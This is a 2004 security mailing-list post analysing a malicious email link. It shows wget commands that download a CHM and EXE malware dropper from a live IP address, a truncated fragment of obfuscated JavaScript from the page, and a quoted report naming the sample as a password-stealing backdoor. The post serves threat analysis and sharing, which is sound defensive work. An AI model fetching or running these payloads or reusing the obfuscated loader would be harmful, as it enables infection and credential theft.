[Dshield] Osama email

Blanchard, Joe BLANCHAJ at bsci.com
Fri Apr 23 18:05:26 GMT 2004


Not sure this is the same as noted on this article.
I'm seeing the following when hitting that link

html off of pics attempts to DL pics.chm, which in turn (I believe)
DLs and runs pics.exe. 
Oddly, while I've not enough time to fully investigate this, it overwrites
my wmplayer.exe resulting in a change in size to 11k from 72k. 
Variant maybe? 

Cheers
-Joe

Follows is wgets of the item(s)
[root@ jgb]# wget http://220.95.231.54/pics
--13:59:16--  http://220.95.231.54/pics
           => `pics'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 302 Object Moved
Location: http://220.95.231.54/pics/ [following]
--13:59:17--  http://220.95.231.54/pics/
           => `index.html'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,113 [text/html]

100%[====================================>] 4,113         17.54K/s    ETA
00:00

13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

[root@ jgb]# more index.html
<script>
<!--
function S(){var s=location.href.substr(7);return
s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+"%
3"+U
()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()+"
%3"+
==========intentional left out full source 
[root at jgb]# wget http://220.95.231.54/pics.chm
--14:00:56--  http://220.95.231.54/pics.chm
           => `pics.chm'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,268 [application/octet-stream]

100%[====================================>] 11,268        23.72K/s    ETA
00:00

14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]
[root at jgb]# wget http://220.95.231.54/pics.exe
--14:03:11--  http://220.95.231.54/pics.exe
           => `pics.exe'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,752 [application/octet-stream]

100%[====================================>] 10,752        21.65K/s    ETA
00:00

14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]




> ----------
> From:
> list-bounces at lists.dshield.org[SMTP:list-bounces at lists.dshield.org] on
> behalf of Deb Hale[SMTP:haled at pionet.net]
> Sent: 	Friday, April 23, 2004 12:40 PM
> To: 	'General DShield Discussion List'
> Subject: 	[Dshield] Osama email
> 
> FYI ,  
>  
> I just received notification from my AV that the file that Bjorn Stromberg
> emailed had the Exploit-MhtRedir.gen virus. It appears that is what they
> are
> calling this particular email.  Symantec calls it Backdoor.Nibu.D and says
> that it attempts to steal passwords and bank account information.  
> http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.ht
> ml
>  
> Deb
>  
> 



More information about the list mailing list